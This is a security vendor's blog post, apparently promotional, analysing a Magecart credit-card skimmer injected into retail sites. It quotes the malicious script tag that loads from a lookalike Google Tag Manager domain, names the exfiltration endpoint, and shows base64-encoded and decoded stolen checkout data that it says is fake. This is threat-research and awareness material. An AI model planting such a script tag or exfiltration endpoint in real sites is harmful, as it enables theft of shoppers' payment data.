We put a lot of thought into our data breach detection engine, a powerful real-time production monitoring solution comprised of 3 main layers, a combination of human intelligence logic and our AI anomaly detection, arming us with the tools needed to detect the old threats and prepare for future attacks.

Last month our team discovered dozens of sites with live credit card skimmers, which we identified as Magecart activity, including one of the largest consumer electronics retailers in the UK and a well-known sports apparel brand from France. We’ve alerted the relevant CISOs who immediately acted to secure customers information.

As a result, we now have new clients and grew our bank of authentic attacks, from which I’m going to share an example:

To demonstrate the malicious activity flow, we will walk through a live example of one of the data breaches identified by our external monitoring solution, Intelligence Pro, to protect our clients’ privacy, we will not share their identity, and site information will not be disclosed.

To simplify this blog post, I also won’t delve into how the malicious JavaScript was injected in the first place, and will just point out that this is not a difficult process considering 1st and 3rd party vulnerabilities on the client-side.

The malware is locally embedded in all known pages of the site at the end of the page via the following JavaScript snippet:  <script src=”https://googletagmanager.eu/gtm.js”></script> a Google Tag Manager lookalike domain googletagmanager.eu instead of the original googletagmanager.com

This script tag loads a remote script which is a generic eCommerce credit card skimming malware, that belongs to the Magecart group of attacks. The script contains the full malicious code which steals the following data to the attacker’s server:

  • Credit card number, expiration date, CVV code
  • Full name
  • Billing address
  • Shipping address

This malware is a known card skimmer operating from a malicious server located at hxxps://googletagmanager.eu  with hxxps://googletagmanager.eu/gtm.js injecting the eCommerce credit card skimming malware. Following the collection of the compromised data, it sends the user’s private information and credit card details via hxxps://www.googletagmanager.eu/ga.js. As seen in the image below:

To hide the information leakage, a simple encoding encryption was performed on the stolen data, a common obfuscation method very simple to revert:

Original Skimming Form Data:

bnVsbGJpbGxpbmdfYWRkcmVzc19pZD0xMjYwOCZiaWxsaW5nW2FkZHJlc3NfaWRdPTI2Mjc2MiZiaWxsaW5nW2ZpcnN0bmFtZV09QWx2aW4mYmlsbGluZ1tsYXN0bmFtZV09TmVhbCZiaWxsaW5nW3RheHZhdF09NzQzLjU5OS4zMjAtNDkmYmlsbGluZ1t0ZWxlcGhvbmVdPSg0NTcpIDMwOS0yNTkxJmJpbGxpbmdbcG9zdGNvZGVdPTIxMzIxLTEyMyZiaWxsaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mYmlsbGluZ1tzdHJlZXRdW109MTI0NSAmYmlsbGluZ1tzdHJlZXRdW109Tmlmb2sgR2xuJmJpbGxpbmdbc3RyZWV0XVtdPTEyNDUmYmlsbGluZ1tjaXR5XT1SaW8mYmlsbGluZ1tyZWdpb25faWRdPTQ4OSZiaWxsaW5nW2NvdW50cnlfaWRdPUJSJmJpbGxpbmdbc2F2ZV9pbl9hZGRyZXNzX2Jvb2tdPTEmYmlsbGluZ1t1c2VfZm9yX3NoaXBwaW5nXT0xJnNoaXBwaW5nX2FkZHJlc3NfaWQ9MTI2MDgmc2hpcHBpbmdbYWRkcmVzc19pZF09MjYyNzYzJnNoaXBwaW5nW2ZpcnN0bmFtZV09QWx2aW4mc2hpcHBpbmdbbGFzdG5hbWVdPU5lYWwmc2hpcHBpbmdbdGVsZXBob25lXT0oNDU3KSAzMDktMjU5MSZzaGlwcGluZ1twb3N0Y29kZV09MjEzMjEtMTIzJnNoaXBwaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mc2hpcHBpbmdbc3RyZWV0XVtdPTEyNDUgJnNoaXBwaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mc2hpcHBpbmdbc3RyZWV0XVtdPTEyNDUmc2hpcHBpbmdbY2l0eV09UmlvJnNoaXBwaW5nW3JlZ2lvbl9pZF09NDg5JnNoaXBwaW5nW2NvdW50cnlfaWRdPUJSJnNoaXBwaW5nW3NhdmVfaW5fYWRkcmVzc19ib29rXT0xJnNoaXBwaW5nW3NhbWVfYXNfYmlsbGluZ109MSZzaGlwcGluZ19tZXRob2Q9bXBfbXVsdGlfc2hpcHBpbmdfbXBfbXVsdGlfc2hpcHBpbmcmc2VsZWN0ZWRfc2hpcHBpbmdbMTE1NV1baXRlbXNdPTE1Njk2OSZmb3JtX2tleT01eUZ5UExxanBnRUZKOTlHJnBheW1lbnRbbWV0aG9kXT1tZXJjYWRvcGFnb19jdXN0b20mPUFwbGljYXImcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW3BheW1lbnRNZXRob2RTZWxlY3Rvcl09LTEmPTQxMTExMTExMTExMTExMTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRFeHBpcmF0aW9uTW9udGhdPTQmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRFeHBpcmF0aW9uWWVhcl09MjAyMyZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bY2FyZGhvbGRlck5hbWVdPUFsdmluIE5lYWwmPTY1NCZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bZG9jVHlwZV09Q1BGJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtkb2NOdW1iZXJdPTcyNTM1NTM0NjIyJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtpc3N1ZXJfaWRdPS0xJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtpbnN0YWxsbWVudHNdPTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW3NpdGVfaWRdPU1MQiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bYW1vdW50XT05MiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bdG90YWxfYW1vdW50XT05MiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bcGF5bWVudE1ldGhvZElkXT12aXNhJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVt0b2tlbl09ZjRjZTE0YWI5ZDgzNDA0ZDkzYWRmZDg0YWY2YTBiNzkmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRUcnVuY2F0ZWRdPTQxMTEgMTEqKiAqKioqIDExMTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2N1c3RvbWVyX2lkXT0zOTU5MjM3MzQtUnlGbmhFYmxqazh5YnUmZm9ybV9rZXk9NXlGeVBMcWpwZ0VGSjk5RyY=

Decoded Skimming Form Data: With all the user private information entered during the purchase flow, including the credit card (all the information entered is random/fake)

nullbilling_address_id=12608&billing[address_id]=262762&billing[firstname]=Alvin&billing[lastname]=Neal&billing[taxvat]=743.599.320-49&billing[telephone]=(457) 309-2591&billing[postcode]=21321-123&billing[street][]=Nifok Gln&billing[street][]=1245 &billing[street][]=Nifok Gln&billing[street][]=1245&billing[city]=Rio&billing[region_id]=489&billing[country_id]=BR&billing[save_in_address_book]=1&billing[use_for_shipping]=1&shipping_address_id=12608&shipping[address_id]=262763&shipping[firstname]=Alvin&shipping[lastname]=Neal&shipping[telephone]=(457) 309-2591&shipping[postcode]=21321-123&shipping[street][]=Nifok Gln&shipping[street][]=1245 &shipping[street][]=Nifok Gln&shipping[street][]=1245&shipping[city]=Rio&shipping[region_id]=489&shipping[country_id]=BR&shipping[save_in_address_book]=1&shipping[same_as_billing]=1&shipping_method=mp_multi_shipping_mp_multi_shipping&selected_shipping[1155][items]=156969&form_key=5yFyPLqjpgEFJ99G&payment[method]=mercadopago_custom&=Aplicar&payment[mercadopago_custom][paymentMethodSelector]=-1&=4111111111111111&payment[mercadopago_custom][cardExpirationMonth]=4&payment[mercadopago_custom][cardExpirationYear]=2023&payment[mercadopago_custom][cardholderName]=Alvin Neal&=654&payment[mercadopago_custom][docType]=CPF&payment[mercadopago_custom][docNumber]=72535534622&payment[mercadopago_custom][issuer_id]=-1&payment[mercadopago_custom][installments]=1&payment[mercadopago_custom][site_id]=MLB&payment[mercadopago_custom][amount]=92&payment[mercadopago_custom][total_amount]=92&payment[mercadopago_custom][paymentMethodId]=visa&payment[mercadopago_custom][token]=f4ce14ab9d83404d93adfd84af6a0b79&payment[mercadopago_custom][cardTruncated]=4111 11** **** 1111&payment[mercadopago_custom][customer_id]=395923734-RyFnhEbljk8ybu&form_key=5yFyPLqjpgEFJ99G&

ChameleonX Intelligence Pro detected this data breach immediately with the activation of the external site scan. While this is quite a simple form of attack, it is unknown how long is has been active prior to our detection.

Detection time is a critical factor, with similar Magecart attacks making the news globally including large brands such as British Airways, Ticketmaster and Newegg, the time to detection is a 30 – 45 days on average.

In today’s web business environment, relying on 3rd party services to help businesses grow, supply chain attacks are quite impossible to prevent, with no control over vendors security protocols or obligation to customer privacy. This makes the detection time a crucial factor for the implications of a data breach